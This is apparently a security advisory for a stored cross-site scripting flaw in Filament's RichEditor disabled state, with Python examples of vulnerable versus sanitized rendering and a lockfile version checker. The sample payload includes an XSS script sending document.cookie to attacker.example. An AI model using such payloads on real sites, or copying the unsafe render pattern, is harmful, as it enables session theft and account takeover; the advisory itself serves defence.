EXECUTIVE SUMMARY:
CVE-2026-55409 (CVSS 7.6, high severity) is a stored cross-site scripting (XSS) vulnerability in the filament/forms package affecting versions 3.0.0 through 3.3.52. When a RichEditor field is rendered in its disabled state, the field's raw state is output without HTML sanitization, so any HTML or JavaScript contained in that state is executed in the browser of whoever views the form. Exploitation requires the attacker to get malicious markup into the field's stored state first, for example through the form's data storage or submission process, or through another user-input path of the application; this is possible whenever the data used to fill the form state is not sanitized on the way in. A successful attack executes arbitrary JavaScript in the context of the vulnerable application, which enables theft of user sessions, modification of data and takeover of user accounts. The business impact can be significant, including compromised user data, loss of system integrity and financial losses.
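The mechanism described above, as an added illustration in Python that is not Filament's code and does not reproduce Filament's actual rendering path: a disabled field whose stored state is interpolated verbatim into the page, beside a hardened version that runs the stored state through an allow-list sanitizer at render time. The attacker-controlled state, the allowed tag and attribute sets, and the wrapper markup are all constructed for this example. In a real Laravel application a maintained HTML sanitizer library should be used rather than a hand-written one; the sanitizer here exists only to make the difference between the two renderings concrete and runnable offline.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Rich-text markup an attacker could have persisted into the field's state
# (constructed sample; assumes the attacker can write to the stored value, e.g.
# through another form, import or API path that is not itself sanitized).
ATTACKER_STATE = (
    '<p>Quarterly <b>report</b></p>'
    '<img src=x onerror="alert(document.cookie)">'
    '<a href="javascript:alert(1)">click</a>'
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
)


def render_disabled_field_unsafe(state: str) -> str:
    """Vulnerable pattern: the stored HTML is placed in the page verbatim
    (the equivalent of Blade's {!! $state !!}). Whatever the attacker stored
    runs in the viewer's browser."""
    return f'<div class="rich-editor" aria-disabled="true">{state}</div>'


# Allow-list for what a rich-text field legitimately needs (assumed for this example).
ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "u", "s", "a",
                "ul", "ol", "li", "h2", "h3", "blockquote"}
ALLOWED_ATTRS = {"a": {"href"}}                 # no style=, no on*= handlers anywhere
VOID_TAGS = {"br"}
SAFE_SCHEMES = {"", "http", "https", "mailto"}  # "" allows relative URLs


def is_safe_url(url: str) -> bool:
    # Rejects javascript:, data:, vbscript: and any other scheme not listed.
    return urlparse(url.strip()).scheme.lower() in SAFE_SCHEMES


class AllowlistSanitizer(HTMLParser):
    """Re-serialise HTML keeping only allow-listed tags and attributes. Unknown
    tags are dropped (their text is kept), <script>/<style> bodies are dropped
    entirely, and all remaining text and attribute values are re-escaped."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # >0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops onerror=, onclick=, style=, srcdoc=, ...
            if name == "href" and not is_safe_url(value):
                continue  # drops javascript: and data: links
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    def handle_comment(self, data):
        pass  # comments (including conditional comments) never reach the output


def sanitize_html(html: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


def render_disabled_field_safe(state: str) -> str:
    """Hardened pattern: sanitise the stored state on the server at render
    time, so the output is safe regardless of how the state got into storage."""
    return f'<div class="rich-editor" aria-disabled="true">{sanitize_html(state)}</div>'


if __name__ == "__main__":
    print("vulnerable:", render_disabled_field_unsafe(ATTACKER_STATE))
    print("hardened:  ", render_disabled_field_safe(ATTACKER_STATE))
```

Sanitizing at render time matters here because the advisory's prerequisite is that the stored data was never cleaned on the way in; an output-side allow-list neutralizes the stored payload even when every write path was missed, and it is the right place for the fix regardless of which path the attacker used.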
RECOMMENDATION:
We recommend updating filament/forms to version 3.3.53, the first release that contains the fix.
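A quick way to tell whether a deployment is in the affected range before upgrading, as an added example that is not part of the advisory: the check below reads the installed version of filament/forms out of a project's composer.lock and compares it against the 3.0.0 through 3.3.52 range stated above. The lockfile excerpt is constructed for the example; the field names (packages, packages-dev, name, version) are the standard Composer lockfile layout. Versions that cannot be compared numerically, such as a dev branch, are reported as unknown rather than silently treated as safe.

```python
import json

# Constructed excerpt of a composer.lock file (not a real project's lockfile).
SAMPLE_COMPOSER_LOCK = json.dumps({
    "packages": [
        {"name": "filament/forms", "version": "v3.3.52"},
        {"name": "laravel/framework", "version": "v11.20.0"},
    ],
    "packages-dev": [],
})

AFFECTED_PACKAGE = "filament/forms"
FIRST_AFFECTED = (3, 0, 0)
LAST_AFFECTED = (3, 3, 52)   # 3.3.53 is the first patched release


def parse_version(text: str):
    """Turn 'v3.3.52' or '3.3.52-beta1' into (3, 3, 52).
    Returns None for non-numeric versions such as 'dev-main'."""
    core = text.lstrip("v").split("-")[0].split("+")[0]
    parts = core.split(".")
    if not all(p.isdigit() for p in parts):
        return None
    nums = [int(p) for p in parts[:3]]
    while len(nums) < 3:
        nums.append(0)
    return tuple(nums)


def is_affected(version: str):
    """True if inside the affected range, False if outside, None if unknown."""
    v = parse_version(version)
    if v is None:
        return None
    return FIRST_AFFECTED <= v <= LAST_AFFECTED


def check_lockfile(lock_json: str) -> dict:
    """Report the installed filament/forms version and whether it is affected.
    Both the runtime and dev sections are searched, since the package could be
    pulled in either way."""
    lock = json.loads(lock_json)
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            if pkg.get("name") == AFFECTED_PACKAGE:
                installed = pkg.get("version", "")
                return {"installed": installed, "affected": is_affected(installed)}
    return {"installed": None, "affected": False}


if __name__ == "__main__":
    print(check_lockfile(SAMPLE_COMPOSER_LOCK))
```

To run it against a real project, replace SAMPLE_COMPOSER_LOCK with the contents of that project's composer.lock; a result of affected True (or None) means the upgrade to 3.3.53 is still outstanding.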
REFERENCES:
The following reports contain further technical details:
https://github.com/advisories/GHSA-m9cv-24rx-8mv7